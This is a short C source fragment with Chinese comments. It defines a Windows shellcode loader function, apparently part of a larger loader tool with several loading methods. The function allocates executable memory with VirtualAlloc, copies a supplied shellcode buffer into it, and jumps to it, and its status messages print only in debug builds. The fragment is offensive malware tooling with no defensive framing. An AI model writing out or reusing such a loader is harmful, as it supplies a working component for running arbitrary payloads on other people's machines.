// 默认加载方式：动态加载的简化版本
void ExecuteLoader(PBYTE shellcode, SIZE_T shellcodeSize) {
#ifdef _DEBUG
    printf("[*] 默认加载方式执行Shellcode\n");
#endif
    LPVOID exec_mem = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec_mem) {
#ifdef _DEBUG
        printf("[!] VirtualAlloc失败: %d\n", GetLastError());
#endif
        return;
    }
    memcpy(exec_mem, shellcode, shellcodeSize);
    ((void(*)())exec_mem)();
    VirtualFree(exec_mem, 0, MEM_RELEASE);
}